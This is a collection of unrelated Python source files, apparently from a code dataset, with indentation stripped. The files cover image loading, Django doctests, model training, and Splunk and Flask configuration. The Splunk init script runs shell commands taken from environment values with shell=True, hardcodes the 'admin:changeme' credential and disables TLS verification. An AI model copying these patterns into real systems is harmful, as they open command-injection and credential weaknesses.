def load_image(self, scene_data, tgt_idx):
img_file = scene_data['dir']/'image_{}'.format(scene_data['cid'])/'data'/scene_data['frame_id'][tgt_idx]+'.png'
if not img_file.isfile():
return None
img = imread(img_file)
zoom_y = self.img_height/img.shape[0]
zoom_x = self.img_width/img.shape[1]
img = imresize(img, (self.img_height, self.img_width))
# workaround for skimage (float [0 .. 1]) and imageio (uint8 [0 .. 255]) interoperability
img = (img * 255).astype(np.uint8)
return img, zoom_x, zoom_y
def get_depth_map(self, scene_data, tgt_idx):
# compute projection matrix velodyne->image plane
R_cam2rect = np.eye(4)
calib_dir = scene_data['dir'].parent
cam2cam = read_calib_file(calib_dir/'calib_cam_to_cam.txt')
velo2cam = read_calib_file(calib_dir/'calib_velo_to_cam.txt')
velo2cam = np.hstack((velo2cam['R'].reshape(3, 3), velo2cam['T'][..., np.newaxis]))
velo2cam = np.vstack((velo2cam, np.array([0, 0, 0, 1.0])))
R_cam2rect[:3, :3] = cam2cam['R_rect_00'].reshape(3, 3)
velo2cam = np.dot(R_cam2rect, velo2cam)
velo_file_name = scene_data['dir']/'velodyne_points'/'data'/'{}.bin'.format(scene_data['frame_id'][tgt_idx])
return generate_depth_map(velo_file_name, scene_data['P_rect'], velo2cam,
self.img_width, self.img_height, self.depth_size_ratio)
|
39661
|
from django.db import models
class Publisher(models.Model):
name = models.CharField(max_length=100)
class Author(models.Model):
name = models.CharField(max_length=100)
class Book(models.Model):
name = models.CharField(max_length=100)
authors = models.ManyToManyField(Author, related_name='books')
publisher = models.ForeignKey(Publisher, related_name='books')
__test__ = {'one':"""
#
# RelatedManager
#
# First create a Publisher.
>>> p = Publisher.objects.create(name='Acme Publishing')
# Create a book through the publisher.
>>> book, created = p.books.get_or_create(name='The Book of Ed & Fred')
>>> created
True
# The publisher should have one book.
>>> p.books.count()
1
# Try get_or_create again, this time nothing should be created.
>>> book, created = p.books.get_or_create(name='The Book of Ed & Fred')
>>> created
False
# And the publisher should still have one book.
>>> p.books.count()
1
#
# ManyRelatedManager
#
# Add an author to the book.
>>> ed, created = book.authors.get_or_create(name='Ed')
>>> created
True
# Book should have one author.
>>> book.authors.count()
1
# Try get_or_create again, this time nothing should be created.
>>> ed, created = book.authors.get_or_create(name='Ed')
>>> created
False
# And the book should still have one author.
>>> book.authors.count()
1
# Add a second author to the book.
>>> fred, created = book.authors.get_or_create(name='Fred')
>>> created
True
# The book should have two authors now.
>>> book.authors.count()
2
# Create an Author not tied to any books.
>>> Author.objects.create(name='Ted')
<Author: Author object>
# There should be three Authors in total. The book object should have two.
>>> Author.objects.count()
3
>>> book.authors.count()
2
# Try creating a book through an author.
>>> ed.books.get_or_create(name="<NAME>", publisher=p)
(<Book: Book object>, True)
# Now Ed has two Books, Fred just one.
>>> ed.books.count()
2
>>> fred.books.count()
1
"""}
|
39733
|
from collections import OrderedDict
from rest_framework import serializers
from data_import.models import DataFile
from open_humans.models import User
from private_sharing.models import project_membership_visible
class PublicDataFileSerializer(serializers.ModelSerializer):
"""
Serialize a public data file.
"""
metadata = serializers.JSONField()
def to_representation(self, data):
ret = OrderedDict()
fields = self.get_fields()
query_params = dict(self.context.get("request").query_params)
source = getattr(data, "source")
user_t = getattr(data, "user")
usernames = []
if "username" in query_params:
usernames = query_params["username"]
visible = project_membership_visible(user_t.member, source)
if (user_t.username in usernames) and not visible:
return ret
request = self.context.get("request", None)
for field in fields:
item = getattr(data, str(field))
if isinstance(item, User):
if visible:
member = getattr(user_t, "member")
user = {
"id": getattr(member, "member_id"),
"name": getattr(member, "name"),
"username": getattr(item, "username"),
}
else:
user = {"id": None, "name": None, "username": None}
ret["user"] = user
elif field == "download_url":
ret["download_url"] = item(request)
else:
ret[str(field)] = getattr(data, field)
return ret
class Meta: # noqa: D101
model = DataFile
fields = (
"id",
"basename",
"created",
"download_url",
"metadata",
"source",
"user",
)
|
39737
|
import os
import sys
import json
import time
import socket
import re
import glob
import subprocess
import requests
import splunk.clilib.cli_common
import splunk.util
var_expandvars_re = re.compile(r'\AENV\((.*)\)$')
var_shell_re = re.compile(r'\ASHELL\((.*)\)$')
def main():
"""
    Initialize the node. Can run both before and after Splunk has started.
"""
if sys.argv[1] == "--configure":
configure()
elif sys.argv[1] == "--wait-splunk":
wait_splunk(sys.argv[2], sys.argv[3:])
elif sys.argv[1] == "--add-licenses":
add_licenses(sys.argv[2])
elif sys.argv[1] == "--shc-autobootstrap":
shc_autobootstrap(int(sys.argv[2]), sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6], sys.argv[7], sys.argv[8])
else:
exit(1)
def configure():
"""
    Using CONF__ notation you can define any configuration, for example:
    CONF__[{location_under_splunk_home}__]{conf_file}__{stanza}__{key}=value
    If location_under_splunk_home is not specified, "system" is used.
"""
# Allow to set any configurations with this
conf_updates = {}
for env, val in os.environ.iteritems():
if env.startswith("CONF__"):
parts = env.split("__")[1:]
conf_file_name = None
parent = None
conf_folder = "system"
if len(parts) == 4:
conf_folder = parts[0]
parts = parts[1:]
conf_folder_full = __get_conf_folder_full(conf_folder, parent)
file_name = parts[0]
if file_name == "meta":
file_name = "local.meta"
subfolder = "metadata"
else:
file_name = file_name + ".conf"
subfolder = "local"
conf_file = os.path.join(conf_folder_full, subfolder, file_name)
conf_updates.setdefault(conf_file, {}).setdefault(parts[1], {})[parts[2]] = __get_value(val)
for conf_file, conf_update in conf_updates.iteritems():
conf = splunk.clilib.cli_common.readConfFile(conf_file) if os.path.exists(conf_file) else {}
for stanza, values in conf_update.iteritems():
dest_stanza = conf.setdefault(stanza, {})
dest_stanza.update(values)
if "default" in conf and not conf["default"]:
del conf["default"]
folder = os.path.dirname(conf_file)
if not os.path.isdir(folder):
os.makedirs(folder)
splunk.clilib.cli_common.writeConfFile(conf_file, conf)
def __get_value(val):
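    # Values of the form ENV($NAME) are expanded with os.path.expandvars, while
    # SHELL(cmd) values are replaced by the command's output.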
var_expand_match = var_expandvars_re.match(val)
if var_expand_match:
return os.path.expandvars(var_expand_match.groups()[0])
var_shell_match = var_shell_re.match(val)
if var_shell_match:
        return subprocess.check_output(var_shell_match.groups()[0], shell=True)
return val
def __get_conf_folder_full(conf_folder, parent):
if conf_folder == "system":
return os.path.join(os.environ["SPLUNK_HOME"], "etc", conf_folder)
else:
return os.path.join(os.environ["SPLUNK_HOME"], conf_folder)
def wait_splunk(uri, roles):
"""
Wait 5 minutes for dependency
"""
for x in xrange(1, 300):
try:
# This url does not require authentication, ignore certificate
response = requests.get(uri + "/services/server/info?output_mode=json", verify=False)
if response.status_code == 200:
server_roles = response.json()["entry"][0]["content"]["server_roles"]
if not roles or all(any(re.match(role, server_role) for server_role in server_roles) for role in roles):
return
else:
print "Waiting for " + ", ".join(roles) + " in " + uri + " got " + ", ".join(server_roles) + "."
else:
print "Waiting for "+ ", ".join(roles) + " in " + uri + "."
except requests.exceptions.RequestException as exception:
print "Waiting for " + ", ".join(roles) + " in " + uri + ". Exception: " + str(exception)
time.sleep(1)
print "Failed to connect to " + uri + " and check server roles " + ", ".join(roles)
exit(1)
def add_licenses(folder):
while True:
if os.path.isdir(folder):
licenses = glob.glob(os.path.join(folder, "*.lic"))
if licenses:
# Adding all licenses one by one and break
for license in licenses:
args = [
"add",
"licenses",
"-auth", "admin:changeme",
license
]
__splunk_execute(args)
break
print "Waiting for license files under " + folder
time.sleep(1)
def shc_autobootstrap(autobootstrap, mgmt_uri, local_user, local_password, service_discovery_uri, service_discovery_user, service_discovery_password):
"""
Write current uri to the service discovery URL, if current member has index equal
to INIT_SHCLUSTER_AUTOBOOTSTRAP - bootstrap SHC, if more - add itself to existing SHC
"""
__service_discovery_post(service_discovery_uri, service_discovery_user, service_discovery_password, data=json.dumps({"host": mgmt_uri}), headers={"Content-type": "application/json"})
all_members = __service_discovery_get(service_discovery_uri, service_discovery_user, service_discovery_password, params={"sort": "_key"}).json()
for index, member in enumerate(all_members):
if member["host"] == mgmt_uri:
if (index + 1) == autobootstrap:
__splunk_execute([
"bootstrap",
"shcluster-captain",
"-auth", "%s:%s" % (local_user, local_password),
"-servers_list", ",".join(m["host"] for m in all_members[:autobootstrap])
])
elif (index + 1) > autobootstrap:
                # We do not check whether the current list of members is already bootstrapped,
                # assuming that autobootstrap always equals the number of instances the user
                # creates at the beginning.
__splunk_execute([
"add",
"shcluster-member",
"-auth", "%s:%s" % (local_user, local_password),
"-current_member_uri", next(m["host"] for m in all_members[:autobootstrap])
])
def __service_discovery_get(service_discovery_uri, service_discovery_user, service_discovery_password, **kwargs):
for x in xrange(1, 300):
try:
response = requests.get(service_discovery_uri,
verify=False,
auth=(service_discovery_user, service_discovery_password),
**kwargs)
response.raise_for_status()
return response
except requests.exceptions.RequestException as ex:
print "Failed to make GET request to service discovery url. " + str(ex)
sys.stdout.flush()
sys.stderr.flush()
time.sleep(1)
print "FAILED. Could not make GET request to service discovery url."
exit(1)
def __service_discovery_post(service_discovery_uri, service_discovery_user, service_discovery_password, **kwargs):
for x in xrange(1, 300):
try:
response = requests.post(service_discovery_uri,
verify=False,
auth=(service_discovery_user, service_discovery_password),
**kwargs)
response.raise_for_status()
return response
except requests.exceptions.RequestException as ex:
print "Failed to make POST request to service discovery url. " + str(ex)
sys.stdout.flush()
sys.stderr.flush()
time.sleep(1)
print "FAILED. Could not make POST request to service discovery url."
exit(1)
def __splunk_execute(args):
"""
Execute splunk with arguments
"""
sys.stdout.flush()
sys.stderr.flush()
splunk_args = [os.path.join(os.environ['SPLUNK_HOME'], "bin", "splunk")]
splunk_args.extend(args)
subprocess.check_call(splunk_args)
sys.stdout.flush()
sys.stderr.flush()
if __name__ == "__main__":
main()
|
39739
|
import numpy as np
from ..base import BaseSKI
from tods.detection_algorithm.PyodSOD import SODPrimitive
class SODSKI(BaseSKI):
def __init__(self, **hyperparams):
super().__init__(primitive=SODPrimitive, **hyperparams)
self.fit_available = True
self.predict_available = True
self.produce_available = False
|
39747
|
import torch
import pickle
import argparse
import os
from tqdm import trange, tqdm
import torchtext
from torchtext import data
from torchtext import datasets
from torch import nn
import torch.nn.functional as F
import math
from models import SimpleLSTMModel, AttentionRNN
from train_args import get_arg_parser
import constants
from vocab import Vocabulary, load_vocab
import dataset as d
def build_model(
parser: argparse.ArgumentParser,
en_vocab: Vocabulary,
fr_vocab: Vocabulary,
) -> nn.Module:
# TODO make switch case
args = parser.parse_args()
if args.model_type == 'SimpleLSTM':
SimpleLSTMModel.add_args(parser)
args = parser.parse_args()
return SimpleLSTMModel.build_model(
src_vocab=en_vocab,
trg_vocab=fr_vocab,
encoder_embed_dim=args.encoder_embed_dim,
encoder_hidden_dim=args.encoder_hidden_dim,
encoder_dropout=args.encoder_dropout,
encoder_num_layers=args.encoder_layers,
decoder_embed_dim=args.decoder_embed_dim,
decoder_hidden_dim=args.decoder_hidden_dim,
decoder_dropout=args.decoder_dropout,
decoder_num_layers=args.decoder_layers,
)
elif args.model_type == 'AttentionRNN':
AttentionRNN.add_args(parser)
args = parser.parse_args()
return AttentionRNN.build_model(
src_vocab=en_vocab,
trg_vocab=fr_vocab,
encoder_embed_dim=args.encoder_embed_dim,
encoder_hidden_dim=args.encoder_hidden_dim,
encoder_dropout=args.encoder_dropout,
encoder_num_layers=args.encoder_layers,
decoder_embed_dim=args.decoder_embed_dim,
decoder_hidden_dim=args.decoder_hidden_dim,
decoder_dropout=args.decoder_dropout,
decoder_num_layers=args.decoder_layers,
teacher_student_ratio=args.teacher_student_ratio,
)
else:
raise Exception(
"Unknown Model Type: {}".format(args.model_type)
)
def train(
train_loader: d.BatchedIterator,
valid_loader: d.BatchedIterator,
model: nn.Module,
epochs: int,
learning_rate: float,
weight_decay: float,
log_dir: str,
save_dir: str,
en_vocab: Vocabulary,
fr_vocab: Vocabulary,
device: str,
multi_gpu: bool,
save_step: int,
model_name: str,
optimizer: str,
) -> None:
model = model.to(device)
if multi_gpu and device == 'cuda':
print('Using multi gpu training')
model = torch.nn.DataParallel(model, device_ids=[0, 1]).cuda()
if optimizer == "sgd":
print("using stochastic gradient descent optimizer")
optim = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
elif optimizer == "adam":
print("using adam optimizer")
optim = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
else:
raise Exception("Illegal Optimizer {}".format(optimizer))
# [DEBUG]: count number of nans
nan_count = 0
for e in range(epochs):
total_loss = 0.0
count = 0
with tqdm(train_loader, total=len(train_loader)) as pbar:
for i, data in enumerate(pbar):
src, trg, src_lengths, trg_lengths, prev_tokens, prev_lengths = data
src = src.to(device)
trg = trg.to(device)
src_lengths = src_lengths.to(device)
trg_lengths = trg_lengths.to(device)
prev_tokens = prev_tokens.to(device)
prev_lengths = prev_lengths.to(device)
# feed everything into model
# compute loss
# call backwards
# trg_tensor = torch.cat([trg, eos_tensor], dim=1).to(device)
# prev_tokens = torch.cat([eos_tensor, trg], dim=1).to(device)
optim.zero_grad()
predicted, _ = model.forward(src, src_lengths, prev_tokens)
if not multi_gpu:
loss = model.loss(predicted.view(-1, predicted.size(-1)), trg.view(-1))
else:
# if using data parallel, loss has to be computed here
# there is no longer a model loss function that we have
# access to.
# TODO: data parallel kills the computer, why?
loss = F.cross_entropy(
predicted.view(-1, predicted.size(-1)),
                        trg.view(-1),
ignore_index=fr_vocab.word2idx(constants.PAD_TOKEN),
)
if math.isnan(loss.item()):
'''
Ignore nan loss for backward, and continue forward
'''
nan_count += 1
print('found nan at {}'.format(i))
torch.save(
model.state_dict(),
os.path.join(save_dir, model_name, 'unk_problem.pt')
)
return
loss.backward()
optim.step()
total_loss += loss.item()
count += 1
pbar.set_postfix(
loss_avg=total_loss/(count),
epoch="{}/{}".format(e + 1, epochs),
curr_loss=loss.item(),
nan_count=nan_count,
)
pbar.refresh()
if (i + 1) % save_step == 0:
print('Saving model at iteration {} for epoch {}'.format(i, e))
model_file_name = "model_epoch_{}_itr_{}".format(e, i)
torch.save(
model.state_dict(),
os.path.join(save_dir, model_name, model_file_name)
)
print("Summary: Total Loss {} | Count {} | Average {}".format(total_loss, count, total_loss / count))
model_file_name = "model_epoch_{}_final".format(e)
print('saving to {}'.format(os.path.join(save_dir, model_name, model_file_name)))
torch.save(
model.state_dict(),
os.path.join(save_dir, model_name, model_file_name)
)
train_loader.reset()
# valid_loader.reset()
def main() -> None:
parser = get_arg_parser()
args = parser.parse_args()
device = "cuda" if torch.cuda.is_available() and args.cuda else "cpu"
print('using device {}'.format(device))
print('loading vocabulary...')
if args.small:
print('using small training set')
en_vocab = load_vocab(constants.SMALL_TRAIN_EN_VOCAB_FILE)
fr_vocab = load_vocab(constants.SMALL_TRAIN_FR_VOCAB_FILE)
else:
en_vocab = load_vocab(constants.TRAIN_EN_VOCAB_FILE)
fr_vocab = load_vocab(constants.TRAIN_FR_VOCAB_FILE)
print('loaded vocabulary')
print('loading datasets...')
if args.small:
train_dataset = d.ShardedCSVDataset(constants.WMT14_EN_FR_SMALL_TRAIN_SHARD)
else:
train_dataset = d.ShardedCSVDataset(constants.WMT14_EN_FR_TRAIN_SHARD)
# valid_dataset = d.DualFileDataset(
# constants.WMT14_EN_FR_VALID + ".en",
# constants.WMT14_EN_FR_VALID + ".fr",
# )
train_loader = d.BatchedIterator(
args.batch_size,
train_dataset,
en_vocab,
fr_vocab,
args.max_sequence_length,
)
# valid_loader = d.BatchedIterator(
# 1,
# valid_dataset,
# en_vocab,
# fr_vocab,
# args.max_sequence_length,
# )
model = build_model(parser, en_vocab, fr_vocab)
print('using model...')
print(model)
if not os.path.exists(args.log_dir):
os.makedirs(args.log_dir)
if not os.path.exists(os.path.join(args.save_dir, args.model_name)):
os.makedirs(os.path.join(args.save_dir, args.model_name))
# model.load_state_dict(torch.load('delete/model_1543183590.2138884/unk_problem.pt'))
train(
train_loader=train_loader,
valid_loader=None, # valid_loader,
model=model,
epochs=args.num_epochs,
learning_rate=args.learning_rate,
weight_decay=args.weight_decay,
log_dir=args.log_dir,
save_dir=args.save_dir,
en_vocab=en_vocab,
fr_vocab=fr_vocab,
device=device,
multi_gpu=args.multi_gpu,
save_step=args.save_step,
model_name=args.model_name,
optimizer=args.optimizer,
)
if __name__ == "__main__":
main()
|
39755
|
from functools import reduce
import numpy as np
import json
import tensorflow as tf
from scipy.optimize import linear_sum_assignment
import os
import time
def deleteDuplicate_v1(input_dict_lst):
f = lambda x,y:x if y in x else x + [y]
return reduce(f, [[], ] + input_dict_lst)
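# e.g. deleteDuplicate_v1([{"a": 1}, {"a": 1}, {"b": 2}]) == [{"a": 1}, {"b": 2}]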
def get_context_pair(resp, l):
label_weights = l['label_weights']
valid_resp = {}
for key in resp:
valid_resp[key] = []
for index, value in enumerate(resp[key]):
if label_weights[index] == 1:
valid_resp[key].append(value)
answer = l['answer_tokens']
position_tokens = l['tokens']
label_position = [lpos-1 for index, lpos in enumerate(l['label_positions']) if label_weights[index]==1]
score_label = []
for index in range(len(valid_resp['pred_label'])):
label = valid_resp['pred_label'][index]
score = valid_resp['max_prob'][index]
position = label_position[index]
position_token = position_tokens[str(position)][1]
if label == 1:
score = 1 - score
score_label.append({"score":score, "label":label,
"position_token":position_token,
"answer":answer})
return score_label
def format_score_matrix(result_lst, score_merge='mean'):
answer_dict = {}
candidate_dict = {}
answer_index = 0
pos_index = 0
for item in result_lst:
if item['answer'] not in answer_dict:
answer_dict[item['answer']] = answer_index
answer_index += 1
if item['position_token'] not in candidate_dict:
candidate_dict[item['position_token']] = pos_index
pos_index += 1
score_matrix = -np.ones((len(answer_dict), len(candidate_dict)))
for item in result_lst:
answer_pos = answer_dict[item['answer']]
candidate_pos = candidate_dict[item['position_token']]
score_matrix_score = score_matrix[answer_pos, candidate_pos]
if score_matrix_score == -1:
score_matrix[answer_pos, candidate_pos] = item['score']
else:
if score_merge == 'mean':
score_matrix[answer_pos, candidate_pos] += item['score']
score_matrix[answer_pos, candidate_pos] /= 2
elif score_merge == 'max':
if item['score'] > score_matrix[answer_pos, candidate_pos]:
score_matrix[answer_pos, candidate_pos] = item['score']
return score_matrix, answer_dict, candidate_dict
flags = tf.flags
FLAGS = flags.FLAGS
# os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
tf.logging.set_verbosity(tf.logging.INFO)
flags.DEFINE_string("buckets", "", "oss buckets")
flags.DEFINE_string(
    "input_file", None,
    "Input file with one JSON-serialized example per line.")
flags.DEFINE_string(
    "output_file", None,
    "Output file for the predicted candidate-to-answer mappings.")
flags.DEFINE_string(
    "model_file", None,
    "Path of the exported saved model.")
flags.DEFINE_string(
    "score_merge", "max",
    "How to merge duplicate scores for the same answer/candidate pair: 'mean' or 'max'.")
input_file = os.path.join(FLAGS.buckets, FLAGS.input_file)
output_file = os.path.join(FLAGS.buckets, FLAGS.output_file)
model_file = os.path.join(FLAGS.buckets, FLAGS.model_file)
from tensorflow.contrib import predictor
# model_dict = {
# "model":'/data/xuht/albert.xht/nlpcc2019/open_data/model/1566283032'
# }
model_dict = {
"model":model_file
}
chid_model = predictor.from_saved_model(model_dict['model'])
fwobj = tf.gfile.Open(output_file, "w")
cnt = 0
valid_keys = ['input_ids', 'label_weights',
'label_positions', 'label_ids',
'segment_ids']
with tf.gfile.Open(input_file, "r") as f:
for index, line in enumerate(f):
content = json.loads(line.strip())
total_resp = []
start = time.time()
for t in content:
tmp = {}
for l in t:
for key in valid_keys:
if key in tmp:
tmp[key].append(l[key])
else:
tmp[key] = [l[key]]
# tmp = {
# "input_ids":np.array([l['input_ids']]),
# 'label_weights':np.array([l['label_weights']]),
# 'label_positions':np.array([l['label_positions']]),
# 'label_ids':np.array([l['label_ids']]),
# 'segment_ids':np.array([l['segment_ids']]),
# }
resp = chid_model(tmp)
resp_lst = []
batch_size = int(resp['pred_label'].shape[0]/5)
for key in resp:
resp[key] = np.reshape(resp[key], [-1, 5]).tolist()
for i_index in range(batch_size):
tmp = {
"pred_label":resp['pred_label'][i_index],
"max_prob":resp['max_prob'][i_index],
}
resp_lst.append(tmp)
for i_index in range(len(t)):
resp_ = resp_lst[i_index]
l_ = t[i_index]
result = get_context_pair(resp_, l_)
total_resp.extend(result)
total_resp = deleteDuplicate_v1(total_resp)
        resp = format_score_matrix(total_resp, score_merge=FLAGS.score_merge)
row_ind, col_ind = linear_sum_assignment(resp[0])
mapping_dict = dict(zip(col_ind, row_ind))
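        # linear_sum_assignment solves the Hungarian assignment over the
        # answer-by-candidate score matrix; zip(col_ind, row_ind) then maps each
        # chosen candidate column to its assigned answer row.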
dura = time.time()-start
candidte_dict = resp[-1]
candidate_inverse_dict = {}
for key in candidte_dict:
candidate_inverse_dict[candidte_dict[key]] = key
candidate_name_dict = {}
for col in mapping_dict:
col_name = candidate_inverse_dict[col]
candidate_name_dict[col_name] = int(mapping_dict[col])
cnt += len(candidate_name_dict)
if np.mod(index, 100) == 0:
print(candidate_name_dict, index, dura)
fwobj.write(json.dumps(candidate_name_dict, ensure_ascii=False)+"\n")
fwobj.close()
print('==total cnt==', cnt)
|
39777
|
from collections import OrderedDict
import pandas as pd
from tests import project_test, assert_output
@project_test
def test_csv_to_close(fn):
tickers = ['A', 'B', 'C']
dates = ['2017-09-22', '2017-09-25', '2017-09-26', '2017-09-27', '2017-09-28']
fn_inputs = {
'csv_filepath': 'prices_2017_09_22_2017-09-28.csv',
'field_names': ['ticker', 'date', 'open', 'high', 'low', 'close', 'volume', 'adj_close', 'adj_volume']}
fn_correct_outputs = OrderedDict([
(
'close',
pd.DataFrame(
[
[152.48000000, 149.19000000, 59.35000000],
[151.11000000, 145.06000000, 60.29000000],
[152.42000000, 145.21000000, 57.74000000],
[154.34000000, 147.02000000, 58.41000000],
[153.68000000, 147.19000000, 56.76000000]],
dates, tickers))])
assert_output(fn, fn_inputs, fn_correct_outputs)
|
39829
|
import dash
import dash_bio as dashbio
import dash_html_components as html
import dash_core_components as dcc
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
app.layout = html.Div([
'Select which chromosomes to display on the ideogram below:',
dcc.Dropdown(
id='displayed-chromosomes',
options=[{'label': str(i), 'value': str(i)} for i in range(1, 23)],
multi=True,
value=[str(i) for i in range(1, 23)]
),
dashbio.Ideogram(
id='my-dashbio-ideogram'
),
html.Div(id='ideogram-rotated')
])
@app.callback(
dash.dependencies.Output('my-dashbio-ideogram', 'chromosomes'),
[dash.dependencies.Input('displayed-chromosomes', 'value')]
)
def update_ideogram(value):
return value
@app.callback(
dash.dependencies.Output('ideogram-rotated', 'children'),
[dash.dependencies.Input('my-dashbio-ideogram', 'rotated')]
)
def update_ideogram_rotated(rot):
return 'You have {} selected a chromosome.'.format(
'' if rot else 'not')
if __name__ == '__main__':
app.run_server(debug=True)
|
39868
|
def assign_variable(robot_instance, variable_name, args):
"""Assign a robotframework variable."""
variable_value = robot_instance.run_keyword(*args)
robot_instance._variables.__setitem__(variable_name, variable_value)
return variable_value
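# Hypothetical usage, assuming `robot` exposes run_keyword() and an internal
# _variables mapping:
#   assign_variable(robot, '${GREETING}', ['Set Variable', 'hello'])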
|
39893
|
import tfcoreml as tf_converter
tf_converter.convert(tf_model_path = 'retrained_graph.pb',
mlmodel_path = 'converted.mlmodel',
output_feature_names = ['final_result:0'],
image_input_names = 'input:0',
class_labels = 'retrained_labels.txt',
red_bias = -1,
green_bias = -1,
blue_bias = -1,
image_scale = 2.0/224.0
)
|
39980
|
from datetime import datetime, timezone
from flask import abort
from flask_unchained import BundleConfig
from http import HTTPStatus
from .forms import (
LoginForm,
RegisterForm,
ForgotPasswordForm,
ResetPasswordForm,
ChangePasswordForm,
SendConfirmationForm,
)
from .models import AnonymousUser
class AuthenticationConfig:
"""
Config options for logging in and out.
"""
SECURITY_LOGIN_FORM = LoginForm
"""
The form class to use for the login view.
"""
SECURITY_DEFAULT_REMEMBER_ME = False
"""
Whether or not the login form should default to checking the
"Remember me?" option.
"""
SECURITY_REMEMBER_SALT = 'security-remember-salt'
"""
Salt used for the remember me cookie token.
"""
SECURITY_USER_IDENTITY_ATTRIBUTES = ['email'] # FIXME-identity
"""
List of attributes on the user model that can used for logging in with.
Each must be unique.
"""
SECURITY_POST_LOGIN_REDIRECT_ENDPOINT = '/'
"""
The endpoint or url to redirect to after a successful login.
"""
SECURITY_POST_LOGOUT_REDIRECT_ENDPOINT = '/'
"""
The endpoint or url to redirect to after a user logs out.
"""
class ChangePasswordConfig:
"""
Config options for changing passwords
"""
SECURITY_CHANGEABLE = False
"""
Whether or not to enable change password functionality.
"""
SECURITY_CHANGE_PASSWORD_FORM = ChangePasswordForm
"""
Form class to use for the change password view.
"""
SECURITY_POST_CHANGE_REDIRECT_ENDPOINT = None
"""
Endpoint or url to redirect to after the user changes their password.
"""
SECURITY_SEND_PASSWORD_CHANGED_EMAIL = \
'mail_bundle' in BundleConfig.current_app.unchained.bundles
"""
Whether or not to send the user an email when their password has been changed.
Defaults to True, and it's strongly recommended to leave this option enabled.
"""
class EncryptionConfig:
"""
Config options for encryption hashing.
"""
SECURITY_PASSWORD_SALT = 'security-password-salt'
"""
Specifies the HMAC salt. This is only used if the password hash type is
set to something other than plain text.
"""
SECURITY_PASSWORD_HASH = 'bcrypt'
"""
Specifies the password hash algorithm to use when hashing passwords.
Recommended values for production systems are ``argon2``, ``bcrypt``,
or ``pbkdf2_sha512``. May require extra packages to be installed.
"""
SECURITY_PASSWORD_SINGLE_HASH = False
"""
Specifies that passwords should only be hashed once. By default, passwords
are hashed twice, first with SECURITY_PASSWORD_SALT, and then with a random
salt. May be useful for integrating with other applications.
"""
SECURITY_PASSWORD_SCHEMES = ['argon2',
'bcrypt',
'pbkdf2_sha512',
# and always the last one...
'plaintext']
"""
List of algorithms that can be used for hashing passwords.
"""
SECURITY_PASSWORD_HASH_OPTIONS = {}
"""
Specifies additional options to be passed to the hashing method.
"""
SECURITY_DEPRECATED_PASSWORD_SCHEMES = ['auto']
"""
List of deprecated algorithms for hashing passwords.
"""
SECURITY_HASHING_SCHEMES = ['sha512_crypt']
"""
List of algorithms that can be used for creating and validating tokens.
"""
SECURITY_DEPRECATED_HASHING_SCHEMES = []
"""
List of deprecated algorithms for creating and validating tokens.
"""
class ForgotPasswordConfig:
"""
Config options for recovering forgotten passwords
"""
SECURITY_RECOVERABLE = False
"""
Whether or not to enable forgot password functionality.
"""
SECURITY_FORGOT_PASSWORD_FORM = ForgotPasswordForm
"""
Form class to use for the forgot password form.
"""
# reset password (when the user clicks the link from the email sent by forgot pw)
# --------------
SECURITY_RESET_PASSWORD_FORM = ResetPasswordForm
"""
Form class to use for the reset password form.
"""
SECURITY_RESET_SALT = 'security-reset-salt'
"""
Salt used for the reset token.
"""
SECURITY_RESET_PASSWORD_WITHIN = '5 days'
"""
Specifies the amount of time a user has before their password reset link
    expires. Always pluralize the time unit for this value. Defaults to 5 days.
"""
SECURITY_POST_RESET_REDIRECT_ENDPOINT = None
"""
Endpoint or url to redirect to after the user resets their password.
"""
SECURITY_INVALID_RESET_TOKEN_REDIRECT = 'security_controller.forgot_password'
"""
Endpoint or url to redirect to if the reset token is invalid.
"""
SECURITY_EXPIRED_RESET_TOKEN_REDIRECT = 'security_controller.forgot_password'
"""
Endpoint or url to redirect to if the reset token is expired.
"""
SECURITY_API_RESET_PASSWORD_HTTP_GET_REDIRECT = None
"""
Endpoint or url to redirect to if a GET request is made to the reset password
view. Defaults to None, meaning no redirect. Useful for single page apps.
"""
SECURITY_SEND_PASSWORD_RESET_NOTICE_EMAIL = \
'mail_bundle' in BundleConfig.current_app.unchained.bundles
"""
Whether or not to send the user an email when their password has been reset.
Defaults to True, and it's strongly recommended to leave this option enabled.
"""
class RegistrationConfig:
"""
Config options for user registration
"""
SECURITY_REGISTERABLE = False
"""
Whether or not to enable registration.
"""
SECURITY_REGISTER_FORM = RegisterForm
"""
The form class to use for the register view.
"""
SECURITY_POST_REGISTER_REDIRECT_ENDPOINT = None
"""
The endpoint or url to redirect to after a user completes the
registration form.
"""
SECURITY_SEND_REGISTER_EMAIL = \
'mail_bundle' in BundleConfig.current_app.unchained.bundles
"""
Whether or not send a welcome email after a user completes the
registration form.
"""
# email confirmation options
# --------------------------
SECURITY_CONFIRMABLE = False
"""
Whether or not to enable required email confirmation for new users.
"""
SECURITY_SEND_CONFIRMATION_FORM = SendConfirmationForm
"""
Form class to use for the (re)send confirmation email form.
"""
SECURITY_CONFIRM_SALT = 'security-confirm-salt'
"""
Salt used for the confirmation token.
"""
SECURITY_LOGIN_WITHOUT_CONFIRMATION = False
"""
Allow users to log in without confirming their email first. (This option
only applies when :attr:`SECURITY_CONFIRMABLE` is True.)
"""
SECURITY_CONFIRM_EMAIL_WITHIN = '5 days'
"""
How long to wait until considering the token in confirmation emails to
be expired.
"""
SECURITY_POST_CONFIRM_REDIRECT_ENDPOINT = None
"""
Endpoint or url to redirect to after the user confirms their email.
Defaults to :attr:`SECURITY_POST_LOGIN_REDIRECT_ENDPOINT`.
"""
SECURITY_CONFIRM_ERROR_REDIRECT_ENDPOINT = None
"""
Endpoint to redirect to if there's an error confirming the user's email.
"""
class TokenConfig:
"""
Config options for token authentication.
"""
SECURITY_TOKEN_AUTHENTICATION_KEY = 'auth_token'
"""
Specifies the query string parameter to read when using token authentication.
"""
SECURITY_TOKEN_AUTHENTICATION_HEADER = 'Authentication-Token'
"""
Specifies the HTTP header to read when using token authentication.
"""
SECURITY_TOKEN_MAX_AGE = None
"""
Specifies the number of seconds before an authentication token expires.
Defaults to None, meaning the token never expires.
"""
class Config(AuthenticationConfig,
ChangePasswordConfig,
EncryptionConfig,
ForgotPasswordConfig,
RegistrationConfig,
TokenConfig,
BundleConfig):
"""
Config options for the Security Bundle.
"""
